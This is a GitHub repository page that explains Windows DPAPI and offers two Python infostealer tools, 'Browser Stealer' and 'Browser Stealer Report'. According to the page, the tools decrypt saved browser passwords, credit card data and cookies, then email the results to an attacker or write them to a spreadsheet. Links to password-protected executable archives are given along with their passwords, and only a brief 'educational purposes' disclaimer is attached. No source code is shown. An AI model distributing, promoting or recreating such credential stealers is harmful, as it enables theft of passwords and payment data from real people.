Skip to content
/ DPAPI Public

Information stored in applications is decrypted using DPAPI. In this way, attacker passwords may be captured. For use in attack scenarios, two applications written in Python language have been developed that steal the information stored in internet browsers: 1-Browser Stealer, 2-Browser Stealer Report

5 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

abdulkadir-gungor/DPAPI

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

35 Commits
Browser_Stealer
Browser_Stealer
 
 
Browser_Stealer_Report
Browser_Stealer_Report
 
 
README.md
README.md
 
 

Repository files navigation

Data Protection Application Programming Interface (DPAPI)

DPAPI is a simple cryptology programming interface that comes bundled with operating systems in later versions starting with Windows 2000. In theory the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.

What does DPAPI protect?

DPAPI is utilized to protect the following personal data:
-Passwords and form auto-completion data in Internet Explorer, Yandex, Google "Chrome", etc.
-E-mail account passwords in Outlook, Windows Mail, etc.
-Shared folders and resources access password
-Internal FTP manager account passwords
-Outlook for S/MIME
-Wireless network account keys and passwords
-Private keys for Encrypting File System (EFS), SSL/TLS in Internet Information Services
-Network passwords in Credential Manager
-Personal data in any application protected with the API function.

Why is DPAPI important for cybersecurity?

Information stored in applications is decrypted using DPAPI. In this way, attacker passwords may be captured. For use in attack scenarios, two applications written in Python language have been developed that steal the information stored in internet browsers.

-Browser Stealer
-Browser Stealer Report

Browser Stealer

Finds Internet browsers and applications that use those browsers. It detects files that hold personal information such as username and password, and credit card information. It decrypts these files using DPAPI. It transmits this information to the attacker via email.

For more information.

Screenshot [1]

3

(Executable) Browser Stealer Download
Browser_Stealer.rar --> zip password: "BrOWserSteaLEr2022"
Link = https://drive.google.com/file/d/1Q2XkhU64vHzKfyxmuPh-c9U3JdoqFeyS/view?usp=sharing

Browser Stealer Report

Finds internet browsers and applications that use those browsers. It detects files containing personal information such as username and password, credit card information and cookies. It decrypts these files using DPAPI. It saves this information in an excel file named "Report.xls".

For more information.

Screenshot [1]

8

Screenshot [2]

10

(Executable) Browser Stealer Report
Browser_Stealer_Report.rar --> zip password: "BroWSerSteaLErRePOrt2022"
Link = https://drive.google.com/file/d/13ZrjFqpua_BijbaE52RQ2gfCPX65Mubh/view?usp=sharing

Legal Warning

Run your tests on virtual machines. The responsibility for illegal use belongs to the user. Shared for educational purposes.

About

Information stored in applications is decrypted using DPAPI. In this way, attacker passwords may be captured. For use in attack scenarios, two applications written in Python language have been developed that steal the information stored in internet browsers: 1-Browser Stealer, 2-Browser Stealer Report

Topics

browser hack cybersecurity cyber-security dpapi chrome-password-grabber password-stealer edge-password-grabber yandex-password-grabber chromium-password-grabber brave-password-grabber

Resources

Readme
Activity

Stars

5 stars

Watchers

2 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages